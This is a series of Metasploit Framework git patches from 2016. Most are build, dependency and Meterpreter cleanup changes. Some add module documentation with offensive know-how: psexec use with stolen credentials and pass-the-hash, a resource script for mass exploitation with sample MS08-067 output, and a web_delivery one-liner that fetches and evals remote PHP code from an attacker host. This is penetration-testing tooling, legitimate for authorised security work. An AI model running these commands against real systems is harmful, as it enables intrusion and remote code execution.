+9,17 @@ # ### -require 'octokit' require 'net/http' -require 'nokogiri' require 'optparse' +begin + require 'octokit' + require 'nokogiri' +rescue LoadError => e + gem = e.message.split.last + abort "#{gem} not installed: please run `gem install #{gem}'" +end + module FilePullRequestCollector class Exception < RuntimeError; end From 55724eb777794174d9fd039ed9727b8fae8d47aa Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Tue, 1 Mar 2016 10:58:05 -0600 Subject: [PATCH 460/686] Set the exit status correctly --- tools/modules/file_pull_requests.rb | 20 ++++++++------------ 1 file changed, 8 insertions(+), 12 deletions(-) diff --git a/tools/modules/file_pull_requests.rb b/tools/modules/file_pull_requests.rb index 5932c71240..547561ff18 100755 --- a/tools/modules/file_pull_requests.rb +++ b/tools/modules/file_pull_requests.rb @@ -208,13 +208,11 @@ module FilePullRequestCollector begin opts.parse!(args) rescue OptionParser::InvalidOption - puts "Invalid option, try -h for usage" - exit + abort "Invalid option, try -h for usage" end if options.empty? - puts "No options specified, try -h for usage" - exit + abort "No options specified, try -h for usage" end options @@ -227,16 +225,15 @@ if __FILE__ == $PROGRAM_NAME begin opts = FilePullRequestCollector::OptsParser.parse(ARGV) rescue OptionParser::InvalidOption, OptionParser::MissingArgument => e - puts "#{e.message} (please see -h)" - exit + abort "#{e.message} (please see -h)" end if !opts.has_key?(:api_key) if !ENV.has_key?('GITHUB_OAUTH_TOKEN') - puts - puts "A Github Access Token must be specified to use this tool" - puts "Please set GITHUB_OAUTH_TOKEN or specify the -k option" - exit + abort <<EOF +A Github Access Token must be specified to use this tool +Please set GITHUB_OAUTH_TOKEN or specify the -k option +EOF else opts[:api_key] = ENV['GITHUB_OAUTH_TOKEN'] end @@ -246,8 +243,7 @@ if __FILE__ == $PROGRAM_NAME cli = FilePullRequestCollector::Client.new(opts[:api_key]) cli.search(opts[:file]) rescue FilePullRequestCollector::Exception => e - $stderr.puts e.message - exit + abort e.message rescue Interrupt $stdout.puts $stdout.puts "Good bye" From 25a05813950dc76cac809d1170422c98bc385b5b Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Wed, 2 Mar 2016 09:55:34 -0600 Subject: [PATCH 461/686] Install Bundler in msfupdate if we don't have it --- msfupdate | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/msfupdate b/msfupdate index 76d16f5afe..7ea3426c35 100755 --- a/msfupdate +++ b/msfupdate @@ -185,7 +185,14 @@ class Msfupdate system("git", "merge", "#{remote}/#{branch}") stdout.puts "[*] Updating gems..." - require 'bundler' + begin + require 'bundler' + rescue LoadError + stderr.puts '[*] Installing bundler' + system('gem', 'install', 'bundler') + Gem.clear_paths + require 'bundler' + end Bundler.with_clean_env do system("bundle", "install") end From e615e1072ecb6d7f0495c0b77daa0b51194428be Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Wed, 2 Mar 2016 10:51:45 -0600 Subject: [PATCH 462/686] Update information about SMBv1 --- .../auxiliary/scanner/smb/smb_login.md | 2 +- .../modules/exploit/windows/smb/psexec.md | 57 ++++++++----------- 2 files changed, 26 insertions(+), 33 deletions(-) diff --git a/documentation/modules/auxiliary/scanner/smb/smb_login.md b/documentation/modules/auxiliary/scanner/smb/smb_login.md index 41647069f7..e0e9391b68 100644 --- a/documentation/modules/auxiliary/scanner/smb/smb_login.md +++ b/documentation/modules/auxiliary/scanner/smb/smb_login.md @@ -4,7 +4,7 @@ and log into more machines. ## Vulnerable Application -To use smb_login, make sure you are able to connect to a SMB service. +To use smb_login, make sure you are able to connect to a SMB service that supports SMBv1. ## Verification Steps diff --git a/documentation/modules/exploit/windows/smb/psexec.md b/documentation/modules/exploit/windows/smb/psexec.md index 7502114d88..4c7a571c08 100644 --- a/documentation/modules/exploit/windows/smb/psexec.md +++ b/documentation/modules/exploit/windows/smb/psexec.md @@ -12,37 +12,13 @@ you normally would with any Metasploit exploits. To be able to use exploit/windows/smb/psexec, you must meet these requirements: 1. You have a valid username/password. -2. Firewall allows SMB. -2. The remote Windows machine's network security policy allows it. If you see [one of these errors](https://github.com/rapid7/metasploit-framework/wiki/What-does-my-Rex%3A%3AProto%3A%3ASMB-Error-mean%3F), it's an indication it doesn't. +2. Firewall allows SMB traffic. +3. Target is using SMBv1. +4. The remote Windows machine's network security policy allows it. If you see [one of these errors](https://github.com/rapid7/metasploit-framework/wiki/What-does-my-Rex%3A%3AProto%3A%3ASMB-Error-mean%3F), it's an indication it doesn't. ## Verification Steps -Please see Basic Usage under Overview. - -## Options - -By default, exploit/windows/smb/psexec can be as simple as setting the RHOST option, and ready to -go. But in reality, you will probably need to at least configure: - -**The SMBUser Option** - -A valid Windows username. - -**The SMBPass option** - -This can be either the plain text version, or the Windows hash. - -## Scenarios - -**Typical Usage** - -Password stealing is always the first thing in order to use psexec. How you will be able to do that -really depends on the situation. But one thing for sure, if psexec is possible, so should smb_login. - -The following shows the basic workflow of using both modules and gain access: - -1. use auxiliary/scanner/smb/smb_login (please refer to that module documentation to learn usage) -2. Assuming you have found a good password, use psexec like the following: +At the minimum, you should be able use psexec to get a session with a valid credential: ``` msf > use exploit/windows/smb/psexec @@ -68,6 +44,22 @@ msf exploit(psexec) > exploit meterpreter > ``` +## Options + +By default, exploit/windows/smb/psexec can be as simple as setting the RHOST option, and ready to +go. But in reality, you will probably need to at least configure: + +**The SMBUser Option** + +A valid Windows username. + +**The SMBPass option** + +This can be either the plain text version, or the Windows hash. + +## Scenarios + + **Pass the Hash** One common penetration testing scenario with using psexec is that attackers usually begin by @@ -119,13 +111,14 @@ The Powershell target forces the psexec module to run a Powershell command with in it. Since this approach does not leave anything on disk, it is a very powerful way to evade antivirus. However, older Windows machines might not support Powershell by default. -Ideally, you probably want to use the Automatic target setting instead of this since it will check -if Powershell is possible first. +Ideally, you probably want to use the Automatic target setting instead of this. Because the +automatic mode will check if the target supports Powershell or not before it tries, but the +manually set Powershell target won't do that. **Native Upload Target** -By default, the Native target will attempt to upload the payload (executable) to SYSTEM32 -(modifiable with the SHARE datastore option) , and then execute it with psexec. +The Native target will attempt to upload the payload (executable) to SYSTEM32 (modifiable with the +SHARE datastore option) , and then execute it with psexec. This approach is rather reliable, but has a high chance of getting caught by antivirus on the target. To counter this, you can try to use a template by setting the EXE::Path and EXE::Template From 9f147a54a1782d9bfa7d794b57f935c339913682 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Wed, 2 Mar 2016 10:53:13 -0600 Subject: [PATCH 463/686] Update Gemfile for Sawyer (because Octokit needs it) --- Gemfile.lock | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/Gemfile.lock b/Gemfile.lock index fa8f08f5bc..05b5ed2ee3 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -208,6 +208,9 @@ GEM rspec-support (3.3.0) rubyntlm (0.6.0) rubyzip (1.2.0) + sawyer (0.6.0) + addressable (~> 2.3.5) + faraday (~> 0.8, < 0.10) shoulda-matchers (2.8.0) activesupport (>= 3.0.0) simplecov (0.9.2) @@ -253,3 +256,6 @@ DEPENDENCIES simplecov timecop yard + +BUNDLED WITH + 1.11.2 From eede7c919355fa76717ebd6f269fa16715fa0a87 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Wed, 2 Mar 2016 11:05:33 -0600 Subject: [PATCH 464/686] Link to WbemExec writeup --- documentation/modules/exploit/windows/smb/psexec.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/windows/smb/psexec.md b/documentation/modules/exploit/windows/smb/psexec.md index 4c7a571c08..5fe2abe0c5 100644 --- a/documentation/modules/exploit/windows/smb/psexec.md +++ b/documentation/modules/exploit/windows/smb/psexec.md @@ -126,7 +126,7 @@ datastore options. Or, you can supply your own custom EXE by setting the EXE::Cu **MOF Upload Target** -The MOF target technically does not use psexec: it does not explicitly tell Windows to execute +The [MOF](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-WbemExec-for-a-write-privilege-attack-on-Windows) target technically does not use psexec: it does not explicitly tell Windows to execute anything. All it does is uploading two files: the payload (exe) in SYSTEM32, and a managed object format file in SYSTEM32\wbem\mof\ directory. When Windows sees the mof file in that directory, it automatically runs it. Once executed, the code inside the mof file basically tells Windows to From 851e8b610ed5ba1b4c7c564e490ee5099d7aeb59 Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Wed, 2 Mar 2016 13:44:02 -0600 Subject: [PATCH 465/686] Land metasploit-payloads#80, update to fix #6593 --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index f2c302b3dd..04f1875f8e 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -13,7 +13,7 @@ PATH metasploit-concern (= 1.0.0) metasploit-credential (= 1.0.1) metasploit-model (= 1.0.0) - metasploit-payloads (= 1.1.1) + metasploit-payloads (= 1.1.2) metasploit_data_models (= 1.2.11) msgpack network_interface (~> 0.0.1) @@ -124,7 +124,7 @@ GEM activemodel (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) railties (>= 4.0.9, < 4.1.0) - metasploit-payloads (1.1.1) + metasploit-payloads (1.1.2) metasploit_data_models (1.2.11) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index b00d5adc5b..00da458d7c 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model', '1.0.0' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.1.1' + spec.add_runtime_dependency 'metasploit-payloads', '1.1.2' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. From d355b0e8b7d9a6d9bc782fa861301bfd2686dd06 Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Wed, 2 Mar 2016 13:55:32 -0600 Subject: [PATCH 466/686] update payload sizes --- modules/payloads/singles/python/meterpreter_bind_tcp.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_tcp.rb | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/payloads/singles/python/meterpreter_bind_tcp.rb b/modules/payloads/singles/python/meterpreter_bind_tcp.rb index 9d61027eca..4aa85a2d42 100644 --- a/modules/payloads/singles/python/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_bind_tcp.rb @@ -12,7 +12,7 @@ require 'msf/base/sessions/meterpreter_python' module Metasploit4 - CachedSize = 51062 + CachedSize = 51630 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_http.rb b/modules/payloads/singles/python/meterpreter_reverse_http.rb index f720e147fa..91580b3d11 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb @@ -12,7 +12,7 @@ require 'msf/base/sessions/meterpreter_python' module Metasploit4 - CachedSize = 51026 + CachedSize = 51590 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_https.rb b/modules/payloads/singles/python/meterpreter_reverse_https.rb index 4e02d4ecf1..855b9ff3dc 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb @@ -12,7 +12,7 @@ require 'msf/base/sessions/meterpreter_python' module Metasploit4 - CachedSize = 51026 + CachedSize = 51594 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb index 67d4cbfe69..1caeb47e89 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb @@ -12,7 +12,7 @@ require 'msf/base/sessions/meterpreter_python' module Metasploit4 - CachedSize = 50978 + CachedSize = 51546 include Msf::Payload::Single include Msf::Payload::Python From bc2e38067e2588f6c740c6fcaff064768967ae44 Mon Sep 17 00:00:00 2001 From: darkbushido <lance.sanchez@gmail.com> Date: Wed, 2 Mar 2016 15:57:53 -0600 Subject: [PATCH 467/686] changing the travis.yml to work with GCE --- .travis.yml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/.travis.yml b/.travis.yml index fe143187a5..d3c0d5858e 100644 --- a/.travis.yml +++ b/.travis.yml @@ -1,3 +1,5 @@ +sudo: false +group: stable bundler_args: --without coverage development pcap cache: bundler env: @@ -23,7 +25,6 @@ before_script: script: # fail build if db/schema.rb update is not committed - git diff --exit-code db/schema.rb && bundle exec rake $RAKE_TASKS -sudo: false rvm: - '2.1.8' @@ -40,7 +41,8 @@ branches: - metakitty addons: - postgresql: '9.3' + postgresql: '9.5' apt: packages: - libpcap-dev + - graphviz From 7eb1dcddcb70cc6797d4bfdcc814a2fc453d2d90 Mon Sep 17 00:00:00 2001 From: darkbushido <lance.sanchez@gmail.com> Date: Wed, 2 Mar 2016 16:09:24 -0600 Subject: [PATCH 468/686] Moving the metasploit gems out of the development group --- Gemfile | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/Gemfile b/Gemfile index e80c053372..f553e4a423 100755 --- a/Gemfile +++ b/Gemfile @@ -3,6 +3,10 @@ source 'https://rubygems.org' # spec.add_runtime_dependency '<name>', [<version requirements>] gemspec name: 'metasploit-framework' +gem 'metasploit-concern', git: 'https://github.com/rapid7/metasploit-concern', branch: 'staging/rails-upgrade' +gem 'metasploit_data_models', git: 'https://github.com/rapid7/metasploit_data_models', branch: 'staging/rails-upgrade' +gem 'metasploit-credential', git: 'https://github.com/rapid7/metasploit-credential', branch: 'staging/rails-upgrade' + # separate from test as simplecov is not run on travis-ci group :coverage do # code coverage for tests @@ -19,9 +23,6 @@ group :development do # for development and testing purposes gem 'pry' # rails-upgrade staging gems - gem 'metasploit-concern', git: 'https://github.com/rapid7/metasploit-concern', branch: 'staging/rails-upgrade' - gem 'metasploit_data_models', git: 'https://github.com/rapid7/metasploit_data_models', branch: 'staging/rails-upgrade' - gem 'metasploit-credential', git: 'https://github.com/rapid7/metasploit-credential', branch: 'staging/rails-upgrade' end group :development, :test do From 6bee4e759b294953e3322a63ed28b5a61e186b7f Mon Sep 17 00:00:00 2001 From: darkbushido <lance.sanchez@gmail.com> Date: Wed, 2 Mar 2016 16:21:51 -0600 Subject: [PATCH 469/686] trying to add the postgres service to travis.yml --- .travis.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/.travis.yml b/.travis.yml index d3c0d5858e..3e8fe251bb 100644 --- a/.travis.yml +++ b/.travis.yml @@ -46,3 +46,6 @@ addons: packages: - libpcap-dev - graphviz + +services: + - postgresql \ No newline at end of file From 11964c5c1a2f22ade03e2f5d2e01dce609848939 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Wed, 2 Mar 2016 19:52:11 -0600 Subject: [PATCH 470/686] Add remote exploit demo and web_delivery doc --- .../remote_exploit_demo_template.erb | 95 +++++++++++++++++++ .../exploit/multi/script/web_delivery.md | 82 ++++++++++++++++ lib/msf/util/document_generator/normalizer.rb | 35 +++++-- 3 files changed, 202 insertions(+), 10 deletions(-) create mode 100644 data/markdown_doc/remote_exploit_demo_template.erb create mode 100644 documentation/modules/exploit/multi/script/web_delivery.md diff --git a/data/markdown_doc/remote_exploit_demo_template.erb b/data/markdown_doc/remote_exploit_demo_template.erb new file mode 100644 index 0000000000..53238e7725 --- /dev/null +++ b/data/markdown_doc/remote_exploit_demo_template.erb @@ -0,0 +1,95 @@ +Normally, you can use <%= mod.fullname %> this way: + +``` +msf > use <%= mod.fullname %> +msf <%= mod.type %>(<%= mod.shortname %>) > show targets + ... a list of targets ... +msf <%= mod.type %>(<%= mod.shortname %>) > set TARGET target-id +msf <%= mod.type %>(<%= mod.shortname %>) > show options + ... show and set options ... +msf <%= mod.type %>(<%= mod.shortname %>) > exploit +``` + +But since this is a remote exploit module, you can also engage multiple hosts. + +First, create a list of IPs you wish to exploit with this module. One IP per line. + +Second, set up a background payload listener. This payload should be the same as the one your +<%= mod.shortname %> will be using: + +1. Do: ```use exploit/multi/handler``` +2. Do: ```set PAYLOAD [payload]``` +3. Set other options required by the payload +4. Do: ```set EXITONSESSION false``` +5. Do: ```run -j``` + +At this point, you should have a payload listening. + +Next, create the following script. Notice you will probably need to modify the ip_list path, and +payload options accordingly: + +``` +<ruby> +# +# Modify the path if necessary +# +ip_list = '/tmp/ip_list.txt' + +File.open(ip_list, 'rb').each_line do |ip| + print_status("Trying against #{ip}") + run_single("use <%= mod.fullname %>") + run_single("set RHOST #{ip}") + run_single("set DisablePayloadHandler true") + + # + # Set a payload that's the same as the handler. + # You might also need to add more run_single commands to configure other + # payload options. + # + run_single("set PAYLOAD [payload name]") + + run_single("run") +end +</ruby> +``` + +Next, run the resource script in the console: + +``` +msf > resource [path-to-resource-script] +``` + +And finally, you should see that the exploit is trying against those hosts similar to the following +MS08-067 example: + +``` +msf > resource /tmp/exploit_hosts.rc +[*] Processing /tmp/exploit_hosts.rc for ERB directives. +[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes) +[*] Trying against 192.168.1.80 + +RHOST => 192.168.1.80 +DisablePayloadHandler => true +PAYLOAD => windows/meterpreter/reverse_tcp +LHOST => 192.168.1.199 + +[*] 192.168.1.80:445 - Automatically detecting the target... +[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English +[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) +[*] 192.168.1.80:445 - Attempting to trigger the vulnerability... +[*] Sending stage (957999 bytes) to 192.168.1.80 +[*] Trying against 192.168.1.109 +RHOST => 192.168.1.109 +DisablePayloadHandler => true +PAYLOAD => windows/meterpreter/reverse_tcp +LHOST => 192.168.1.199 +[*] 192.168.1.109:445 - Automatically detecting the target... +[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown +[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English +[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX) +[*] 192.168.1.109:445 - Attempting to trigger the vulnerability... +[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600 + +[*] Sending stage (957999 bytes) to 192.168.1.109 +[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600 +``` diff --git a/documentation/modules/exploit/multi/script/web_delivery.md b/documentation/modules/exploit/multi/script/web_delivery.md new file mode 100644 index 0000000000..3694fc16c4 --- /dev/null +++ b/documentation/modules/exploit/multi/script/web_delivery.md @@ -0,0 +1,82 @@ +As a web server, web_delivery provides a great way to deliver a payload during post exploitation, +with the intention to stay stealthy because the payload does not touch the disk. + +Currently, web_delivery supports three different languages for delivery: Python, PHP, and +Powershell. You should be able to tell which one you can use based on the target environment +you are in. + +For example: if you have gained access through a PHP application, then it's safe to assume you can +use PHP. If you're in a Windows server (such as Windows Server 2008), then it's probably safe to +say the target supports Powershell. + +## Verification Steps + +To be able to use web_delivery, you must gain access to the target machine first, wit the ability +to execute either the Python, or PHP, or Powershell interpreter. + +At that point, you would use web_delivery similar to the following example: + +1. Start msfconsole +2. Do: ```use exploit/multi/script/web_delivery``` +3. Do: ```set target 1``` (1 is PHP. You can use ```show targets``` to see other options) +4. Do: ```set PAYLOAD php/meterpreter/reverse_tcp``` (You can do ```show payloads``` to see what options are suitable for the target) +5. Do: ```set LHOST IP``` (The IP the payload should connect back to) +6. Do: ```run``` +7. At this point, a handler is up for that payload. And the module should instruct you to execute + a command. +8. Copy the command. Depending on your pentesting scenario, typically you can either inject the + command and get code execution, or run it from the target's shell, and get a session: + +``` +msf exploit(web_delivery) > run +[*] Exploit running as background job. + +[*] Started reverse TCP handler on 172.16.23.1:4444 +msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/z5inGkwCCQiz9 +[*] Local IP: http://10.6.0.86:8080/z5inGkwCCQiz9 +[*] Server started. +[*] Run the following command on the target machine: +php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.23.1:8080/z5inGkwCCQiz9'));" +[*] Delivering Payload +[*] Sending stage (33684 bytes) to 172.16.23.134 +[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.134:41684) at 2016-03-02 11:41:34 -0600 +``` + +## Targets + +**Python** + +Python is a fairly popular language, especially on unix-based systems. For example, it comes with +Ubuntu Linux by default since 8.04. As well as Debian, and Mac OS X since 10.3. + +**PHP** + +PHP is a fairly popular language for web servers, especially Apache. + +**Powershell/win** + +Powershell is a popular language for newer Windows systems. Windows 7 and Windows Server 2008 R2 +are the first Windows versions to come with Powershell by default, and not older systems. + +## Scenarios + +**Against a compromised web application** + +web_delivery would work nicely for a web application with a command execution vulnerability. + +One way to approach this would be: + +1. Start exploit/multi/script/web_delivery +2. Use Burp Suite to intercept the HTTP/HTTPS request, place the command in the parameter that + results in arbitrary code execution. +3. Hopefully the modified HTTP/HTTPS request is successful, and you should get a session. + +**Shell upgrade** + +web_delivery is also useful to upgrade a shell type payload to a meterpreter one. + +Here's how that can be done: + +1. Start exploit/multi/script/web_delivery that generates/ +2. On msfconsole, interact with the shell, and copy/pate the command. +3. You should get a meterpreter session. diff --git a/lib/msf/util/document_generator/normalizer.rb b/lib/msf/util/document_generator/normalizer.rb index 5292304c5c..31c0f9b4c5 100644 --- a/lib/msf/util/document_generator/normalizer.rb +++ b/lib/msf/util/document_generator/normalizer.rb @@ -33,16 +33,26 @@ module Msf module DocumentGenerator class DocumentNormalizer - CSS_BASE_PATH = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'markdown.css')) - TEMPLATE_PATH = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'default_template.erb')) - BES_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'bes_demo_template.erb')) - HTTPSERVER_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'httpserver_demo_template.erb')) - GENERIC_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'generic_demo_template.erb')) - LOCALEXPLOIT_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'localexploit_demo_template.erb')) - POST_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'post_demo_template.erb')) - PAYLOAD_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'payload_demo_template.erb')) - AUXILIARY_SCANNER_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'auxiliary_scanner_template.erb')) - HTML_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'html_template.erb')) + # + # Markdown templates + # + + CSS_BASE_PATH = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'markdown.css')) + HTML_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'html_template.erb')) + TEMPLATE_PATH = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'default_template.erb')) + + # + # Demo templates + # + + REMOTE_EXPLOIT_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'remote_exploit_demo_template.erb')) + BES_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'bes_demo_template.erb')) + HTTPSERVER_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'httpserver_demo_template.erb')) + GENERIC_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'generic_demo_template.erb')) + LOCALEXPLOIT_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'localexploit_demo_template.erb')) + POST_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'post_demo_template.erb')) + AUXILIARY_SCANNER_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'auxiliary_scanner_template.erb')) + PAYLOAD_DEMO_TEMPLATE = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', 'payload_demo_template.erb')) # Returns the module document in HTML form. @@ -228,6 +238,11 @@ module Msf load_template(mod, PAYLOAD_TEMPLATE) elsif mod.kind_of?(Msf::Auxiliary::Scanner) load_template(mod, AUXILIARY_SCANNER_TEMPLATE) + elsif mod.type == 'exploit' && + !mod.kind_of?(Msf::Exploit::FILEFORMAT) && + mod.kind_of?(Msf::Exploit::Remote) && + mod.options['DisablePayloadHandler'] + load_template(mod, REMOTE_EXPLOIT_DEMO_TEMPLATE) else load_template(mod, GENERIC_DEMO_TEMPLATE) end From c250740a8146243e027eb38c9a91545fc040b5ff Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Wed, 2 Mar 2016 21:43:51 -0600 Subject: [PATCH 471/686] Fixup finalizers to not double-close Meterpreter objects We add finalizers to an assortment of Meterpreter-managed objects in order to clean things up in the event that a post module crashes and does not clean things up. However, this also means that even a properly-written post module can lead to an object getting double-closed on the Meterpreter session when the garbage collector kicks in. This can lead to quite non-deterministic behavior and crashes. This change modifies the instance close methods to unregister the finalizer on close, ensuring we cannot do a double-close automatically if one is requested explicitly first. As an additional measure, we check an instance variable to see if we called close directly twice as well. This is not sufficient in itself, since we do not have a reference to 'self' in the finalizer proc to check the close state. This also removes a couple of references to 'self' in the finalizer proc itself, which may cure some memory leaks as well due to circular references. --- lib/rex/post/meterpreter/channel.rb | 11 ++++++++--- .../extensions/stdapi/sys/event_log.rb | 10 ++++++++-- .../stdapi/sys/registry_subsystem/registry_key.rb | 9 +++++++-- .../sys/registry_subsystem/remote_registry_key.rb | 15 ++++++++++----- .../meterpreter/extensions/stdapi/sys/thread.rb | 10 ++++++++-- 5 files changed, 41 insertions(+), 14 deletions(-) diff --git a/lib/rex/post/meterpreter/channel.rb b/lib/rex/post/meterpreter/channel.rb index d693e3bf74..50da0dc185 100644 --- a/lib/rex/post/meterpreter/channel.rb +++ b/lib/rex/post/meterpreter/channel.rb @@ -141,7 +141,9 @@ class Channel if (cid and client) client.add_channel(self) end - ObjectSpace.define_finalizer( self, self.class.finalize(self.client, self.cid) ) + + # Ensure the remote object is closed when all references are removed + ObjectSpace.define_finalizer(self, self.class.finalize(client, cid)) end def self.finalize(client,cid) @@ -288,8 +290,11 @@ class Channel end def _close(addends = nil) - self.class._close(self.client, self.cid, addends) - self.cid = nil + unless self.cid.nil? + ObjectSpace.undefine_finalizer(self) + self.class._close(self.client, self.cid, addends) + self.cid = nil + end end # # Enables or disables interactive mode. diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb index 87bcdf34e4..cb2d556520 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb @@ -60,7 +60,9 @@ class EventLog def initialize(hand) self.client = self.class.client self.handle = hand - ObjectSpace.define_finalizer( self, self.class.finalize(self.client, self.handle) ) + + # Ensure the remote object is closed when all references are removed + ObjectSpace.define_finalizer(self, self.class.finalize(client, hand)) end def self.finalize(client,handle) @@ -185,7 +187,11 @@ class EventLog # Instance method def close - self.class.close(self.client, self.handle) + unless self.handle.nil? + ObjectSpace.undefine_finalizer(self) + self.class.close(self.client, self.handle) + self.handle = nil + end end end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb index bd2bbf34b0..af689a2671 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb @@ -30,7 +30,8 @@ class RegistryKey self.perm = perm self.hkey = hkey - ObjectSpace.define_finalizer( self, self.class.finalize(self.client, self.hkey) ) + # Ensure the remote object is closed when all references are removed + ObjectSpace.define_finalizer(self, self.class.finalize(client, hkey)) end def self.finalize(client,hkey) @@ -115,7 +116,11 @@ class RegistryKey # Instance method for the same def close() - self.class.close(self.client, self.hkey) + unless self.hkey.nil? + ObjectSpace.undefine_finalizer(self) + self.class.close(self.client, self.hkey) + self.hkey = nil + end end ## diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/remote_registry_key.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/remote_registry_key.rb index 7ad533e3f4..8fb734aa98 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/remote_registry_key.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/remote_registry_key.rb @@ -29,11 +29,12 @@ class RemoteRegistryKey self.target_host = target_host self.hkey = hkey - ObjectSpace.define_finalizer( self, self.class.finalize(self.client, self.hkey) ) + # Ensure the remote object is closed when all references are removed + 